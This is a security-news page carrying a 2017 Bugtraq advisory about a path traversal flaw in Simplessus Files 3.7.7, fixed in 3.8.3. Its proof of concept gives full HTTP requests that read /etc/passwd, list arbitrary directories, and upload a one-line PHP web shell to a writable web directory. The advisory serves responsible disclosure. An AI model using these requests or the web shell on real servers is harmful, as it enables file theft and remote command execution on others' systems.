Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2017-20105: Bugtraq: [SYSS-2017-004] Simplessus Files: Path Traversal

A vulnerability was found in Simplessus 3.7.7. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument path with the input …%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.8.3 is able to address this issue. It is recommended to upgrade the affected component.

CVE
#vulnerability#web#js#java#php#auth

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

Bugtraq mailing list archives

From: adrian.vollmer () syss de
Date: Thu, 16 Feb 2017 08:32:56 GMT

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Advisory ID: SYSS-2017-004 Product: Simplessus Files Manufacturer: Simplessus Affected Version(s): 3.7.7 Tested Version(s): 3.7.7 Vulnerability Type: Path Traversal (CWE-22) Risk Level: High Solution Status: Fixed Manufacturer Notification: January 25, 2017 Solution Date: January 25, 2017 Public Disclosure: February 16, 2017 CVE Reference: Not yet assigned Author of Advisory: Dr. Adrian Vollmer, SySS GmbH


Product overview:

Simplessus Files is a file sharing web application.

The manufacturer describes the product as follows (see \[1\]):

    Simplessus Files is a simple software solution to exchange files and
    documents over the internet. No more file sharing via e-mail, FTP or
    CD-ROM with Simplessus Files replace very large files online easily.

Vulnerability overview:

Due to insufficient filtering of user controlled input, Simplessus Files is vulnerable to a path traversal weakness.


Vulnerability Details:

It is an obvious feature that users of the web application can download and
upload files and list directories. However, this should be restricted to
their own files and directories. Simplessus Files allows path traversal such
that any user can read and write any file that the system user which owns
the web server process has access to.

Proof of Concept (PoC):

The following request can be used to read the file /etc/passwd:

POST /?action=FS&download=1 HTTP/1.1 Host: <HOSTNAME> Cookie: UWA_SID=0b2jre4jk217uegjso2qmabrm1; UWA_username=player2 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 110

cmd=download&path=…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2f…%2fetc%2fpasswd

The following request can be used to upload files to arbirtray directories in the file system (assuming www-data has write permissions):

POST /?action=FS&upload=1 HTTP/1.1 Host: <HOSTNAME> Content-Length: 899 Content-Type: multipart/form-data; boundary=---------------------------2005325381163152094834751695 Cookie: UWA_SID=0b2jre4jk217uegjso2qmabrm1; UWA_username=player2 Connection: close

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="name"

o_1b6c3dbioah31hb0ijs5f911cja.png

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="chunk"

0

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="chunks"

1

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="path"

fs/player2/TEST/…/…/…/…/…/…/…/…/…/var/www/writeabledir/

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="fname"

ox2wdkplp3biex-syss.php

  • -----------------------------2005325381163152094834751695 Content-Disposition: form-data; name="file"; filename="test" Content-Type: image/png

<?php system($_REQUEST[‘c’])?>

  • -----------------------------2005325381163152094834751695–

The following request can be used to list all files inside any directory in the file system:

POST /?action=FS&folder_content=1 HTTP/1.1 Host: <HOSTNAME> Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 90 Cookie: UWA_SID=0b2jre4jk217uegjso2qmabrm1; UWA_username=player2 Connection: close

userId=0&nodePath=fs%2Fplayer2%2FTEST/…/…/…/…/…/…/…/…/etc/&dummy=dummy


Solution:

Update to software version to 3.8.3.

Disclosure Timeline:

2017-01-13: Vulnerability discovered 2017-01-25: Vulnerability reported 2017-01-25: Vendor confirmation 2017-02-15: Public disclosure


References:

\[1\] Product website for Simplessus Files
    http://files.simplessus.com
\[2\] SySS Security Advisory SYSS-2017-004
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-004.txt
\[3\] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

Credits:

This security vulnerability was found by Dr. Adrian Vollmer of SySS GmbH.

E-Mail: adrian.vollmer () syss de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Adrian_Vollmer.asc Key ID: 0x037C9FE7 Key Fingerprint: 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7


Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

Copyright:

Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEcM/ojK7n2w9dyDQDDgJ8fgN8n+cFAlilY8EACgkQDgJ8fgN8 n+d7fBAAqZvlSCTt7I+KEI6U/So+7ENnSmPjPGA9kArHMyCoDMPsSNXpAC6vv7Rh 1TeEUmof015eHy0kGGwy8B3dwK9BdXR1IQ7oStKAY2z6jAJorc5Pj5tnk4gvUOWa kkqmBe2Apcd+ONDZefL75Mou0BHyM0HsLbEo+U37gc5pEGXn61h/mVaMAEVPQ6t1 4n9/WbzVLLkdh9lqKRPINL6JjTVmKQhpB0UTmmdPlNpz216rhhvHC00Xz0HTGWeM 5KFehRSLyFyDomAihK9jsvxqje1xdRkkxuN/khhg6a6LZEFe6roqL8AGAyHr/z/k vJxlyE0NFKq62dgIESFHXojQU1Zrwr1c2rSoYVXgSWFJmNdrciJ24aztk8t+epya mg37BbXaljt5VekrIVojWqtH8e2mJdfEmJjgP9J7TY9PJeRuHpJ0DMaLfbpMlMiE zGwNBT3A7Jcso+FBeEz6PQItYLObyywDHtPqk5fzfwgpmessCpq7aN5iknHfJxoA 2jyoX3Of/Q4rpzKBKxVf7pY/qIBUJKaNvXaGQcCcqKgDSMhmmiTUr+OWPjrChakA xAQ8QiQkoqAmH/0tHRvCfdh2y8k7XEQpj87RI2nvHxFuuRGfTj9w4Zood8sTrBag Zin1gomRgTZNL2dCu+6ijZOfIEspslY4bpZws49wWK1LGxWulGY= =7G5Z -----END PGP SIGNATURE-----

Current thread:

  • [SYSS-2017-004] Simplessus Files: Path Traversal adrian . vollmer (Feb 16)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907